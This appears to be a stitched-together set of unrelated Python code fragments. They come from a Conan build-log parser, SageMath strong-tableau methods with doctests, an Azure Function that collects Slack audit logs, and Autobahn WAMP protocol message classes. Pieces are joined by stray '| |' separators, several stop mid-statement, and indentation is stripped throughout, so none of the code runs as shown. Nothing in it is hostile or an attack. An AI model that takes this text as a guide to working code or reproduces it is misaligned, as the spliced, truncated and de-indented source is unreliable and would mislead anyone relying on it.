def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.lines: List[str] = []
self.log = parser.log["config"]
def activated(self, parsed_line: Match) -> bool:
line = parsed_line.group("rest")
return line == "Configuration:"
def process(self, parsed_line: Match) -> None:
line = parsed_line.group(0)
if (
"[env]" in self.lines
and not re.match(r"\w+=|$", line)
or not re.match(r"(\[[\w.-]+]$)|[^\s:]+\s*[:=]|$", line)
):
self.deactivate()
else:
self.lines.append(line)
def _deactivate(self, final=False):
buffer = StringIO("\n".join(self.lines))
config = StrictConfigParser()
config.read_file(buffer, "profile.ini")
for section in config.sections():
self.log[section] = dict(config.items(section))
super()._deactivate(final=True)
class Package(State):
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.parser = parser
def activated(self, parsed_line: Match) -> bool:
line, ref, rest = parsed_line.group(0, "ref", "rest")
if rest == "Calling package()":
self.screen.print(f"Packaging {ref}")
self.parser.setdefaultlog(ref).setdefault("stdout", []).append(line)
return True
return False
def process(self, parsed_line: Match) -> None:
line = parsed_line.group("rest")
match = re.match(
r"(?P<prefix>[\w ]+) '?(?P<id>[a-z0-9]{32,40})(?:[' ]|$)", line
)
log = self.parser.defaultlog
if not match:
log.setdefault("package", []).append(line)
return
if match.group("prefix") == "Created package revision":
log["package_revision"] = match.group("id")
self.deactivate()
return
log["package_id"] = match.group("id")
def _deactivate(self, final=False):
self.parser.setdefaultlog()
super()._deactivate(final=False)
class Export(State):
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.parser = parser
def activated(self, parsed_line: Match) -> bool:
rest = parsed_line.group("rest")
if rest == "Exporting package recipe":
return True
return False
def process(self, parsed_line: Match) -> None:
line, ref, rest = parsed_line.group(0, "ref", "rest")
match = re.match("Exported revision: (?P<recipe_revision>[a-f0-9]{32})", rest)
log = self.parser.getdefaultlog(ref)
if match:
log.update(match.groupdict())
self.deactivate()
else:
log.setdefault("export", []).append(line)
def _deactivate(self, final=False):
self.parser.setdefaultlog()
super()._deactivate(final=True)
class Build(State):
MAX_WIDTH = 65
PROC_JSON_RESET = False
_WARNINGS: Set[str] = set()
BUILD_STATUS_REGEX = re.compile(
r"""(?x)
(?:
(?P<status>
\[\ {0,2}\d+(?:%|[/\d]+) ] | \ +(?:CC|CCLD|CPPAS)(?=\ )
)? # ninja, cmake or automake
.*? # msbuild prints only the filename
)?
(?P<file>
[\-.\w/\\]+ (?(status) \.[a-z]{1,3}$ | \.(?:asm|cpp|cxx|cc?|[sS])$ )
)
"""
)
BUILD_STATUS_REGEX2 = re.compile(
r"""(?x)
(?P<status>$)? # should never match
.*\ [-/]c\ .*? # compile but don't link
(?P<file>
(?:[a-zA-Z]:)? [\-.\w/\\]+ \. (?:asm|cpp|cxx|cc?|[sS])
\b
)
"""
)
REF_LOG_KEY = "build"
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.parser = parser
self.warnings = 0
self.buildmon = BuildMonitor(self.parser.process)
self.log = parser.defaultlog
self.ref = "???"
self.force_status = False
if not Build.PROC_JSON_RESET:
with filehandler("proc_json", hint="process debug json") as fh:
fh.write("{}")
Build.PROC_JSON_RESET = True
def _activated(self, parsed_line: Match) -> bool:
line, self.ref = parsed_line.group("rest", "ref")
if line == "Calling build()":
self.screen.print(f"Building {self.ref}")
return True
return False
@staticmethod
def _deactivated(parsed_line: Match) -> bool:
line = parsed_line.group("rest")
match = re.fullmatch(r"Package '\w+' built", line)
return bool(match) or line.startswith("ERROR:")
def activated(self, parsed_line: Match) -> bool:
full_line, ref = parsed_line.group(0, "ref")
if self._activated(parsed_line):
defaultlog = self.parser.getdefaultlog(ref)
defaultlog.setdefault("stdout", []).append(full_line)
self.log = self.parser.defaultlog = defaultlog.setdefault(
self.REF_LOG_KEY, {}
)
self.log.setdefault("stdout", [])
self.buildmon.start()
return True
return False
def flush_warning_count(self):
if self.warnings and BLOG.isEnabledFor(logging.WARNING):
esc = logger_escape_code(BLOG, "WARNING")
self.screen.print(
f"{esc}{self.warnings:4} warning(s)",
indent=0,
)
self.warnings = 0
def process(self, parsed_line: Match) -> None:
if self._deactivated(parsed_line):
self.deactivate()
return
line = parsed_line.group("rest")
if not line:
return
self.log["stdout"].append(parsed_line.group())
match = self.BUILD_STATUS_REGEX.fullmatch(
line
) or self.BUILD_STATUS_REGEX2.match(line)
if match:
status, file = match.groups()
if status:
self.force_status = True
elif self.force_status:
return
self.flush_warning_count()
with suppress(ValueError, AttributeError):
_current, _total = status.strip("[]").split("/")
status = f"[{_current:>{len(_total)}}/{_total}]"
prefix = f"{status} " if status else ""
output = shorten(
file,
width=self.MAX_WIDTH,
template=f"{prefix}{{}} ",
strip="left",
placeholder="...",
)
# shorten at path separator
output = re.sub(r"\.{3}[^/\\]+(?=[/\\])", "...", output)
self.screen.print(f"{output:{self.MAX_WIDTH}}", overwrite=True)
elif line.startswith("-- ") or line.lower().startswith("checking "):
self.screen.print(shorten_conan_path(line), overwrite=True)
else:
match = self.parser.SEVERITY_REGEX.match(line)
if not (match and added_first(self._WARNINGS, match.group())):
return
level_name = | |
return [[nabs(v) for v in row] for row in self.to_list()]
def to_standard_list(self):
"""
Return the underlying standard strong tableau as a list of lists.
Internally, for a strong tableau the standard strong tableau and its weight
is stored separately. This method returns the underlying standard part.
OUTPUT:
- a list of lists of integers or ``None``
EXAMPLES::
sage: StrongTableau([[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1]).to_standard_list()
[[-1, -2, -3, 4], [-4], [-5]]
sage: StrongTableau([[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_standard_list()
[[None, None, -2, -4], [None, None], [-1, -3], [2, 4], [-5], [5], [5], [5]]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).to_standard_list()
[[None, None], [None]]
sage: StrongTableau([],4).to_standard_list()
[]
"""
return self._tableau
def to_standard_tableau(self):
"""
Return the underlying standard strong tableau as a ``StrongTableau`` object.
Internally, for a strong tableau the standard strong tableau and its weight
is stored separately. This method returns the underlying standard part as a
``StrongTableau``.
OUTPUT:
- a strong tableau with standard weight
EXAMPLES::
sage: T = StrongTableau([[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1])
sage: T.to_standard_tableau()
[[-1, -2, -3, 4], [-4], [-5]]
sage: T.to_standard_tableau() == T.to_standard_list()
False
sage: StrongTableau([[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_standard_tableau()
[[None, None, -2, -4], [None, None], [-1, -3], [2, 4], [-5], [5], [5], [5]]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).to_standard_tableau()
[[None, None], [None]]
sage: StrongTableau([],4).to_standard_tableau()
[]
"""
return StrongTableau(self._tableau, self.k)
def to_unmarked_standard_list( self ):
"""
Return the standard part of the tableau as a list of lists with markings removed.
Return the list of lists of the rows of the tableau where the markings have been
removed.
OUTPUT:
- a list of lists of integers or ``None``
EXAMPLES::
sage: StrongTableau( [[-1, -2, -3, 4], [-4], [-5]], 3, [3,1,1]).to_unmarked_standard_list()
[[1, 2, 3, 4], [4], [5]]
sage: StrongTableau( [[None, None, -1, -2], [None, None], [-1, -2], [1, 2], [-3], [3], [3], [3]], 4).to_unmarked_standard_list()
[[None, None, 2, 4], [None, None], [1, 3], [2, 4], [5], [5], [5], [5]]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).to_unmarked_standard_list()
[[None, None], [None]]
sage: StrongTableau([],4).to_unmarked_standard_list()
[]
"""
return [[nabs(l) for l in x] for x in self.to_standard_list()]
def _latex_(self):
r"""
Return a latex method for the tableau.
EXAMPLES::
sage: T = StrongTableau( [[None, -1, -2, 3], [2, -3]], 2, weight=[2,1] )
sage: Tableaux.options(convention = "English")
sage: latex(T)
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[b]{*{4}c}\cline{1-4}
\lr{}&\lr{1^\ast}&\lr{1^\ast}&\lr{2}\\\cline{1-4}
\lr{1}&\lr{2^\ast}\\\cline{1-2}
\end{array}$}
}
sage: Tableaux.options(convention = "French")
sage: latex(T)
{\def\lr#1{\multicolumn{1}{|@{\hspace{.6ex}}c@{\hspace{.6ex}}|}{\raisebox{-.3ex}{$#1$}}}
\raisebox{-.6ex}{$\begin{array}[t]{*{4}c}\cline{1-2}
\lr{1}&\lr{2^\ast}\\\cline{1-4}
\lr{}&\lr{1^\ast}&\lr{1^\ast}&\lr{2}\\\cline{1-4}
\end{array}$}
}
"""
def chi(x):
if x is None:
return ""
if x in ZZ:
s = "%s"%abs(x)
if x<0:
s += "^\\ast"
return s
return "%s"%x
T = [[chi(x) for x in row] for row in self.to_list()]
from .output import tex_from_array
return tex_from_array(T)
def restrict( self, r ):
r"""
Restrict the standard part of the tableau to the labels `1, 2, \ldots, r`.
Return the tableau consisting of the labels of the standard part of ``self``
restricted to the labels of `1` through ``r``. The result is another
``StrongTableau`` object.
INPUT:
- ``r`` -- an integer
OUTPUT:
- A strong tableau
EXAMPLES::
sage: T = StrongTableau([[None, None, -4, 5, -5], [None, None], [-1, -3], [-2], [2], [2], [3]], 4, weight=[1,1,1,1,1])
sage: T.restrict(3)
[[None, None], [None, None], [-1, -3], [-2], [2], [2], [3]]
sage: TT = T.restrict(0)
sage: TT
[[None, None], [None, None]]
sage: TT == StrongTableau( [[None, None], [None, None]], 4 )
True
sage: T.restrict(5) == T
True
TESTS::
sage: StrongTableau([[None, None], [None]], 4).restrict(1)
[[None, None], [None]]
sage: StrongTableau([],4).restrict(1)
[]
"""
rr = sum(self.weight()[:r])
rest_tab = [y for y in ([x for x in row if x is None or abs(x)<=rr] for row in self.to_standard_list()) if y]
new_parent = StrongTableaux( self.k, (Core([len(x) for x in rest_tab], self.k+1), self.inner_shape()), self.weight()[:r] )
return new_parent(rest_tab)
def set_weight( self, mu ):
"""
Sets a new weight ``mu`` for ``self``.
This method first tests if the underlying standard tableau is column-strict with
respect to the weight ``mu``. If it is, then it changes the weight and returns
the tableau; otherwise it raises an error.
INPUT:
- ``mu`` -- a list of non-negative integers representing the new weight
EXAMPLES::
sage: StrongTableau( [[-1, -2, -3], [3]], 2 ).set_weight( [3] )
[[-1, -1, -1], [1]]
sage: StrongTableau( [[-1, -2, -3], [3]], 2 ).set_weight( [0,3] )
[[-2, -2, -2], [2]]
sage: StrongTableau( [[-1, -2, 3], [-3]], 2 ).set_weight( [2, 0, 1] )
[[-1, -1, 3], [-3]]
sage: StrongTableau( [[-1, -2, 3], [-3]], 2 ).set_weight( [3] )
Traceback (most recent call last):
...
ValueError: [[-1, -2, 3], [-3]] is not a semistandard strong tableau with respect to the partition [3]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).set_weight([])
[[None, None], [None]]
sage: StrongTableau([],4).set_weight([])
[]
"""
if sum(mu)!=self.size() or self.is_column_strict_with_weight( mu ):
return StrongTableaux.__classcall__(StrongTableaux, self.k, (self.outer_shape(), self.inner_shape()), tuple(mu))(self.to_standard_list())
else:
raise ValueError("%s is not a semistandard strong tableau with respect to the partition %s"%(self,mu))
def left_action( self, tij ):
r"""
Action of transposition ``tij`` on ``self`` by adding marked ribbons.
Computes the left action of the transposition ``tij`` on the tableau.
If ``tij`` acting on the element of the affine Grassmannian raises the length by 1,
then this function will add a cell to the standard tableau.
INPUT:
- ``tij`` -- a transposition represented as a pair `(i, j)`.
OUTPUT:
- ``self`` after it has been modified by the action of the transposition ``tij``
EXAMPLES::
sage: StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] ).left_action([0,1])
[[None, -1, -2, -3, 5], [3, -5], [-4]]
sage: StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] ).left_action([4,5])
[[None, -1, -2, -3, -5], [3, 5], [-4]]
sage: T = StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[1,1,1,1] )
sage: T.left_action([-3,-2])
[[None, -1, -2, -3], [3], [-4], [-5]]
sage: T = StrongTableau( [[None, -1, -2, -3], [3], [-4]], 3, weight=[3,1] )
sage: T.left_action([-3,-2])
[[None, -1, -1, -1], [1], [-2], [-3]]
sage: T
[[None, -1, -1, -1], [1], [-2]]
sage: T.check()
sage: T.weight()
(3, 1)
TESTS::
sage: StrongTableau([[None, None], [None]], 4).left_action([-2,-1])
[[None, None], [None], [-1]]
sage: StrongTableau([],4).left_action([0,1])
[[-1]]
"""
T = StrongTableaux._left_action_list(copy.deepcopy( self.to_standard_list() ), tij, self.size()+1, self.k)
return StrongTableau( T, self.k, self.weight()+(1,) )
def follows_tableau( self ):
r"""
Return a list of strong marked tableaux with length one longer than ``self``.
Return list of all strong tableaux obtained from ``self`` by extending to a core
which follows the shape of ``self`` in the strong order.
OUTPUT:
- a list of strong tableaux which follow ``self`` in strong order
EXAMPLES::
sage: T = StrongTableau([[-1,-2,-4,-7],[-3,6,-6,8],[4,7],[-5,-8]], 3, [2,2,3,1])
sage: T.follows_tableau()
[[[-1, -1, -2, -3, 5, 5, -5], [-2, 3, -3, 4], [2, 3], [-3, -4]],
[[-1, -1, -2, -3, 5], [-2, 3, -3, 4], [2, 3, 5], [-3, -4], [-5]],
[[-1, -1, -2, -3, 5], [-2, 3, -3, 4], [2, 3, -5], [-3, -4], [5]],
[[-1, -1, -2, -3, -5], [-2, 3, -3, 4], [2, 3, 5], [-3, -4], [5]],
[[-1, -1, -2, -3], [-2, 3, -3, 4], [2, 3], [-3, -4], [-5], [5], [5]]]
sage: StrongTableau([[-1,-2],[-3,-4]],3).follows_tableau()
[[[-1, -2, 5, 5, -5], [-3, -4]], [[-1, -2, 5], [-3, -4], [-5]],
[[-1, -2, -5], [-3, -4], [5]], [[-1, -2], [-3, -4], [-5], [5], [5]]]
TESTS::
sage: StrongTableau([[None, None], [None]], 4).follows_tableau()
[[[None, None, -1], [None]], [[None, None], [None, -1]], [[None, None], [None], [-1]]]
sage: StrongTableau([],4).follows_tableau()
[[[-1]]]
"""
v = self.size()+1
out = []
for T in StrongTableaux.follows_tableau_unsigned_standard( self.to_standard_list(), self.k ):
for m in StrongTableaux.cells_head_dictionary(T)[v]:
TT = copy.deepcopy(T)
TT[m[0]][m[1]] = -v
out.append(StrongTableau(TT, self.k, self.weight()+(1,)))
return out
def spin_of_ribbon( self, v ):
r"""
Return the spin of the ribbon with label ``v`` in the standard part of ``self``.
The spin of a ribbon is an integer statistic. It is the sum of `(h-1) r` plus
the number of connected components above the marked one where `h` is the height
of the marked ribbon and `r` is the number of connected components.
.. SEEALSO:: :meth:`height_of_ribbon`, :meth:`number_of_connected_components`,
:meth:`ribbons_above_marked`
| |
import requests
import json
import datetime
import azure.functions as func
import base64
import hmac
import hashlib
import os
import logging
import re
from .state_manager import StateManager
customer_id = os.environ['WorkspaceID']
shared_key = os.environ['WorkspaceKey']
slack_api_bearer_token = os.environ['SlackAPIBearerToken']
logAnalyticsUri = os.environ.get('logAnalyticsUri')
log_type = 'SlackAudit'
slack_uri_audit = "https://api.slack.com/audit/v1/logs"
offset_limit = 1000
connection_string = os.environ['AzureWebJobsStorage']
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + customer_id + '.ods.opinsights.azure.com'
pattern = r"https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$"
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("Invalid Log Analytics Uri.")
def action_mapping(event):
action_id = event["action"]
action_dict = {
"workspace_created": "A workspace in an organization was created.",
"workspace_deleted": "A workspace in an organization was deleted.",
"workspace_accepted_migration": "An administrator on a workspace has accepted an invitation to migrate to a Grid organization.",
"workspace_declined_migration": "An administrator on a workspace has declined an invitation to migrate to a Grid organization.",
"migration_scheduled": "A migration was scheduled.",
"organization_verified": "Slack has confirmed the identity of your organization. The organization will now be denoted with a verified badge.",
"organization_unverified": "Slack has flagged a change in your organization’s identity and has unverified it. The organization will no longer be denoted with a verified badge.",
"organization_public_url_updated": "Your organization’s public URL has been changed.",
"organization_created": "An Enterprise Grid organization was created.",
"organization_deleted": "An Enterprise Grid organization was deleted.",
"organization_accepted_migration": "The Org Owner accepted a workspace invitation to join their organization.",
"organization_declined_migration": "The Org Owner declined a workspace invitation to join their organization.",
"billing_address_added": "A billing address was added. Includes a details parameter noting the timestamp the TOS was accepted.",
"emoji_added": "An emoji was added. Includes a details parameter with the name of the emoji.",
"emoji_removed": "An emoji was removed. Includes a details parameter with the name of the emoji.",
"emoji_aliased": "An emoji was given an alias. Includes a details parameter with the name of the alias.",
"emoji_renamed": "An emoji was renamed. Includes a details parameter with the previous and new names of the emoji.",
"message_tombstoned": "A message was tombstoned.",
"message_restored": "A message was restored.",
"manual_export_started": "A workspace admin or owner has started a standard export on a workspace.",
"manual_export_completed": "A standard export on a workspace has finished.",
"corporate_exports_approved": "The corporate export feature has been approved for use on a workspace.",
"corporate_exports_enabled": "The corporate export feature has been enabled for a workspace.",
"scheduled_export_started": "A scheduled corporate export has started.",
"scheduled_export_completed": "A scheduled corporate export has finished.",
"channels_export_started": "A channel export has begun.",
"channels_export_completed": "A channel export is complete.",
"pref.allow_calls": "A preference indicating whether Slack Calls can be used in this workspace has changed.",
"pref.allow_message_deletion": "Someone altered this workspace's settings around whether messages can be deleted or not.",
"pref.app_dir_only": "Whether only Slack App Directory apps can be installed or not in this workspace has changed.",
"pref.app_whitelist_enabled": "Someone's carefully carved or culled the list of apps this workspace has whitelisted.",
"pref.can_receive_shared_channels_invites": "Whether this workspace can receive invites to share channels with other workspaces has changed.",
"pref.commands_only_regular": "The setting determining whether restricted users are restricted from using slash commands was changed.",
"pref.custom_tos": "This workspace's settings on having a custom terms of service have changed.",
"pref.disallow_public_file_urls": "This workspace has modified their public file URL settings for files uploaded within it.",
"pref.dm_retention_changed": "The direct message (DM) retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.dnd_enabled": "Do not disturb settings have been enabled for a workspace.",
"pref.dnd_end_hour": "The exact ending hour for workspace do not disturb settings has been set. Work hard and go home.",
"pref.dnd_start_hour": "The exact starting hour for workspace do not disturb settings has been set. Hopefully everyone is awake and ready to work by then.",
"pref.emoji_only_admins": "Someone modified the list of emoji-administrating admins, so you know who stole the cookies from the cookie jar.",
"pref.enterprise_default_channels": "Someone modified the list of default channels across the enterprise grid.",
"pref.enterprise_team_creation_request": "Someone has requested that your organization allow a new workspace to be created.",
"pref.file_retention_changed": "The file retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.msg_edit_window_mins": "Someone edited the edit messaging window for a workspace!",
"pref.private_channel_retention_changed": "The group (private channel) retention setting changed. Includes a details parameter noting the previous and new values.",
"pref.public_channel_retention_changed": "The channel retention setting type changed. Includes a details parameter noting the previous and new values.",
"pref.retention_override_changed": "The retention override setting, allowing workspace members to set their own retention period for private channels and DMs, changed. Includes a details parameter noting the previous and new values.",
"pref.sign_in_with_slack_disabled": "This workspace changed their preference around allowing Sign in with Slack.",
"pref.slackbot_responses_disabled": "The settings around whether Slackbot's witty responses are enabled or disabled changed.",
"pref.slackbot_responses_only_admins": "There's a secret cabal of admins for those witty Slackbot responses and that list was changed.",
"pref.sso_setting_changed": "The Single Sign On (SSO) restriction changed. Includes a details parameter noting the previous and new values.",
"pref.stats_only_admins": "The list of admins that can work with workspace statistics only has changed.",
"pref.two_factor_auth_changed": "The two-factor authentication requiremented changed. Includes a details parameter noting the previous and new values.",
"pref.username_policy": "A workspace's username policy preference changed.",
"pref.who_can_archive_channels": "Who can archive channels indeed?",
"pref.who_can_create_delete_user_groups": "The list of who can create or delete user groups changed.",
"pref.who_can_create_private_channels": "It's like a who's who of who can create private channels, and it changed.",
"pref.who_can_create_public_channels": "The same as above, but for public channels.",
"pref.who_can_edit_user_groups": "The list of those who can edit user groups changed.",
"pref.who_can_manage_channel_posting_prefs": "Someone's been changing who can manage channel posting preferences",
"pref.who_can_manage_ext_shared_channels": "The list of who can manage externally shared channels has changed for this workspace.",
"pref.who_can_manage_guests": "The list of who can manage guests now has changed for this workspace.",
"pref.who_can_manage_shared_channels": "Settings around who can remove users from shared channels has changed for a workspace.",
"pref.who_can_remove_from_private_channels": "Settings around who can remove users from private channels has changed for a workspace.",
"pref.who_can_remove_from_public_channels": "Settings around who can remove users from public channels has changed for a workspace.",
"ekm_enrolled": "The workspace is now enrolled/managed by EKM.",
"ekm_unenrolled": "The workspace is no longer enrolled or managed by EKM.",
"ekm_key_added": "An EKM key was added for the workspace.",
"ekm_key_removed": "An EKM key was removed for the workspace.",
"ekm_clear_cache_set": "A revocation event has triggered a new TTL for cached date in this workspace.",
"ekm_logging_config_set": "Logging settings for this workspace's EKM configuration have changed.",
"ekm_slackbot_enroll_notification_sent": "Slack sent notifications about this workspace being enrolled in EKM.",
"ekm_slackbot_unenroll_notification_sent": "Slack sent notifications about this workspace no longer being enrolled in EKM.",
"ekm_slackbot_rekey_notification_sent": "Slack sent notifications about this workspace's EKM configuration being rekeyed.",
"ekm_slackbot_logging_notification_sent": "Slack sent notifications about logging changes to EKM in this workspace.",
"user_channel_join": "A user has joined a channel. The user field in this action contains a team identifier so that you can see which team the joining user comes from (useful for externally shared channels).",
"user_channel_leave": "A user has left a channel. This action contains a team identifier so that you can see which team the departing user comes from (useful for externally shared channels).",
"guest_channel_join": "A guest user has joined a channel. This action contains a team identifier so that you can see which team the joining guest comes from (useful for externally shared channels).",
"guest_channel_leave": "A guest user has left a channel. This action contains a team identifier so that you can see which team the departing guest comes from (useful for externally shared channels).",
"guest_created": "A guest was invited to a channel. This action contains a team identifier so that you can see which team the inviting user comes from.",
"channel_moved": "A channel has been moved to a different workspace.",
"public_channel_created": "A public channel was created.",
"private_channel_created": "A private channel was created.",
"public_channel_archive": "A public channel was archived.",
"private_channel_archive": "A private channel was archived.",
"public_channel_unarchive": "A public channel was unarchived.",
"private_channel_unarchive": "A private channel was unarchived.",
"public_channel_deleted": "A public channel was deleted.",
"private_channel_deleted": "A private channel was deleted.",
"mpim_converted_to_private": "A multi-party direct message was converted to a private channel.",
"public_channel_converted_to_private": "A channel which was once public is now private.",
"channel_email_address_created": "An email forwarding address was created for a | |
type of message.
"""
def __init__(self, reason, message=None):
"""
:param reason: WAMP or application error URI for aborting reason.
:type reason: unicode
:param message: Optional human-readable closing message, e.g. for logging purposes.
:type message: unicode or None
"""
assert(type(reason) == six.text_type)
assert(message is None or type(message) == six.text_type)
Message.__init__(self)
self.reason = reason
self.message = message
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
##
assert(len(wmsg) > 0 and wmsg[0] == Abort.MESSAGE_TYPE)
if len(wmsg) != 3:
raise ProtocolError("invalid message length {0} for ABORT".format(len(wmsg)))
details = check_or_raise_extra(wmsg[1], u"'details' in ABORT")
reason = check_or_raise_uri(wmsg[2], u"'reason' in ABORT")
message = None
if u'message' in details:
details_message = details[u'message']
if type(details_message) != six.text_type:
raise ProtocolError("invalid type {0} for 'message' detail in ABORT".format(type(details_message)))
message = details_message
obj = Abort(reason, message)
return obj
def marshal(self):
"""
Marshal this object into a raw message for subsequent serialization to bytes.
:returns: list -- The serialized raw message.
"""
details = {}
if self.message:
details[u'message'] = self.message
return [Abort.MESSAGE_TYPE, details, self.reason]
def __str__(self):
"""
Returns string representation of this message.
"""
return u"Abort(message={0}, reason={1})".format(self.message, self.reason)
class Challenge(Message):
"""
A WAMP ``CHALLENGE`` message.
Format: ``[CHALLENGE, Method|string, Extra|dict]``
"""
MESSAGE_TYPE = 4
"""
The WAMP message code for this type of message.
"""
def __init__(self, method, extra=None):
"""
:param method: The authentication method.
:type method: unicode
:param extra: Authentication method specific information.
:type extra: dict or None
"""
assert(type(method) == six.text_type)
assert(extra is None or type(extra) == dict)
Message.__init__(self)
self.method = method
self.extra = extra or {}
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
##
assert(len(wmsg) > 0 and wmsg[0] == Challenge.MESSAGE_TYPE)
if len(wmsg) != 3:
raise ProtocolError("invalid message length {0} for CHALLENGE".format(len(wmsg)))
method = wmsg[1]
if type(method) != six.text_type:
raise ProtocolError("invalid type {0} for 'method' in CHALLENGE".format(type(method)))
extra = check_or_raise_extra(wmsg[2], u"'extra' in CHALLENGE")
obj = Challenge(method, extra)
return obj
def marshal(self):
"""
Marshal this object into a raw message for subsequent serialization to bytes.
:returns: list -- The serialized raw message.
"""
return [Challenge.MESSAGE_TYPE, self.method, self.extra]
def __str__(self):
"""
Returns string representation of this message.
"""
return u"Challenge(method={0}, extra={1})".format(self.method, self.extra)
class Authenticate(Message):
"""
A WAMP ``AUTHENTICATE`` message.
Format: ``[AUTHENTICATE, Signature|string, Extra|dict]``
"""
MESSAGE_TYPE = 5
"""
The WAMP message code for this type of message.
"""
def __init__(self, signature, extra=None):
"""
:param signature: The signature for the authentication challenge.
:type signature: unicode
:param extra: Authentication method specific information.
:type extra: dict or None
"""
assert(type(signature) == six.text_type)
assert(extra is None or type(extra) == dict)
Message.__init__(self)
self.signature = signature
self.extra = extra or {}
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
#
assert(len(wmsg) > 0 and wmsg[0] == Authenticate.MESSAGE_TYPE)
if len(wmsg) != 3:
raise ProtocolError("invalid message length {0} for AUTHENTICATE".format(len(wmsg)))
signature = wmsg[1]
if type(signature) != six.text_type:
raise ProtocolError("invalid type {0} for 'signature' in AUTHENTICATE".format(type(signature)))
extra = check_or_raise_extra(wmsg[2], u"'extra' in AUTHENTICATE")
obj = Authenticate(signature, extra)
return obj
def marshal(self):
"""
Marshal this object into a raw message for subsequent serialization to bytes.
:returns: list -- The serialized raw message.
"""
return [Authenticate.MESSAGE_TYPE, self.signature, self.extra]
def __str__(self):
"""
Returns string representation of this message.
"""
return u"Authenticate(signature={0}, extra={1})".format(self.signature, self.extra)
class Goodbye(Message):
"""
A WAMP ``GOODBYE`` message.
Format: ``[GOODBYE, Details|dict, Reason|uri]``
"""
MESSAGE_TYPE = 6
"""
The WAMP message code for this type of message.
"""
DEFAULT_REASON = u"wamp.close.normal"
"""
Default WAMP closing reason.
"""
def __init__(self, reason=DEFAULT_REASON, message=None, resumable=None):
"""
:param reason: Optional WAMP or application error URI for closing reason.
:type reason: unicode
:param message: Optional human-readable closing message, e.g. for logging purposes.
:type message: unicode or None
:param resumable: From the server: Whether the session is able to be resumed (true) or destroyed (false). From the client: Whether it should be resumable (true) or destroyed (false).
:type resumable: bool or None
"""
assert(type(reason) == six.text_type)
assert(message is None or type(message) == six.text_type)
assert(resumable is None or type(resumable) == bool)
Message.__init__(self)
self.reason = reason
self.message = message
self.resumable = resumable
@staticmethod
def parse(wmsg):
"""
Verifies and parses an unserialized raw message into an actual WAMP message instance.
:param wmsg: The unserialized raw message.
:type wmsg: list
:returns: An instance of this class.
"""
# this should already be verified by WampSerializer.unserialize
##
assert(len(wmsg) > 0 and wmsg[0] == Goodbye.MESSAGE_TYPE)
if len(wmsg) != 3:
raise ProtocolError("invalid message length {0} for GOODBYE".format(len(wmsg)))
details = check_or_raise_extra(wmsg[1], u"'details' in GOODBYE")
reason = check_or_raise_uri(wmsg[2], u"'reason' in GOODBYE")
message = None
resumable = None
if u'message' in details:
details_message = details[u'message']
if type(details_message) != six.text_type:
raise ProtocolError("invalid type {0} for 'message' detail in GOODBYE".format(type(details_message)))
message = details_message
if u'resumable' in details:
resumable = details[u'resumable']
if type(resumable) != bool:
raise ProtocolError("invalid type {0} for 'resumable' detail in GOODBYE".format(type(resumable)))
obj = Goodbye(reason=reason,
message=message,
resumable=resumable)
return obj
def marshal(self):
"""
Marshal this object into a raw message for subsequent serialization to bytes.
:returns: list -- The serialized raw message.
"""
details = {}
if self.message:
details[u'message'] = self.message
if self.resumable:
details[u'resumable'] = self.resumable
return [Goodbye.MESSAGE_TYPE, details, self.reason]
def __str__(self):
"""
Returns string representation of this message.
"""
return u"Goodbye(message={}, reason={}, resumable={})".format(self.message, self.reason, self.resumable)
class Error(Message):
"""
A WAMP ``ERROR`` message.
Formats:
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Arguments|list]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Arguments|list, ArgumentsKw|dict]``
* ``[ERROR, REQUEST.Type|int, REQUEST.Request|id, Details|dict, Error|uri, Payload|string/binary]``
"""
MESSAGE_TYPE = 8
"""
The WAMP message code for this type of message.
"""
def __init__(self, request_type, request, error, args=None, kwargs=None, payload=None,
enc_algo=None, enc_key=None, enc_serializer=None):
"""
:param request_type: The WAMP message type code for the original request.
:type request_type: int
:param request: The WAMP request ID of the original request (`Call`, `Subscribe`, ...) this error occurred for.
:type request: int
:param error: The WAMP or application error URI for the error that occurred.
:type error: unicode
:param args: Positional values for application-defined exception.
Must be serializable using any serializers in use.
:type args: list or None
:param kwargs: Keyword values for application-defined exception.
Must be serializable using any serializers in use.
:type kwargs: dict or None
:param payload: Alternative, transparent payload. If given, `args` and `kwargs` must be left unset.
:type payload: unicode or bytes
